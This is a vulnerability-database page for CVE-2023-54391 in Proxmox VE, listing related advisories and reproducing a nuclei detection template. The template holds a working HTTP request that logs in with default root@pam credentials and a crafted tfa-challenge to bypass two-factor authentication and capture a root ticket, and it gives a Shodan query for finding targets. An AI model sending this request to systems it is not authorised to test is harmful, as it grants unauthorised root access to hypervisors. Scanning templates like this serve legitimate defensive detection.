Lucene search
+L

Proxmox VE - Default Credentials with TFA Bypass

🗓️ 05 Sep 2026 03:12:04Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 4 Views

Default credentials with TFA challenge bypass in Proxmox VE enabling root access.

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2023-54391
2 Sep 202600:07
circl
cve
CVE
CVE-2023-54391
1 Sep 202621:59
cve
cvelist
Cvelist
CVE-2023-54391 Proxmox VE 7.0-8.0 Authentication Bypass via tfa-challenge Parameter
1 Sep 202621:59
cvelist
euvd
EUVD
EUVD-2023-60613
2 Sep 202600:31
euvd
kitploit
Kitploit
psa-2026-00043-recovery
4 Sep 202622:03
kitploit
nvd
NVD
CVE-2023-54391
1 Sep 202622:17
nvd
ptsecurity
Positive Technologies
PT-2026-84529
1 Sep 202600:00
ptsecurity
vulncheck_kev
VulnCheck KEV
VulnCheck KEV: CVE-2023-54391
1 Sep 202600:00
vulncheck_kev
vulnrichment
Vulnrichment
CVE-2023-54391 Proxmox VE 7.0-8.0 Authentication Bypass via tfa-challenge Parameter
1 Sep 202621:59
vulnrichment
id: CVE-2023-54391

info:
  name: Proxmox VE - Default Credentials with TFA Bypass
  author: DhiyaneshDk,0x_Akoko
  severity: critical
  description: |
    Detected Proxmox VE was accessible using default root@pam credentials combined with a TFA challenge bypass. An attacker could authenticate as root by submitting the default password "root@pam" along with a crafted tfa-challenge parameter, thereby bypassing two-factor authentication enforcement and gaining full administrative access to the hypervisor management interface.
  impact: |
    Unauthenticated attackers can bypass authentication and gain unauthorized access, including root privileges.
  remediation: |
    Update to version 8.0.4 or later.
  metadata:
    verified: true
    max-request: 1
    shodan-query: title:"Proxmox"
  tags: cve,cve2023,proxmox,auth-bypass,vuln,vkev

http:
  - raw:
      - |
        POST /api2/json/access/ticket HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded;charset=UTF-8
        Accept: application/json

        username=root%40pam&password=root%40pam&tfa-challenge=NEBUSEC-CHALLENGE

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"data"'
          - '"ticket"'
        condition: and

      - type: word
        part: header
        words:
          - application/json

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: ticket
        part: body
        regex:
          - '"ticket"\s*:\s*"([^"]+)"'
        group: 1

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Sep 2026 11:41Current
5.4Medium risk
Vulners AI Score5.4
CVSS 49.3
CVSS 3.19.8
EPSS0.01747
SSVC
4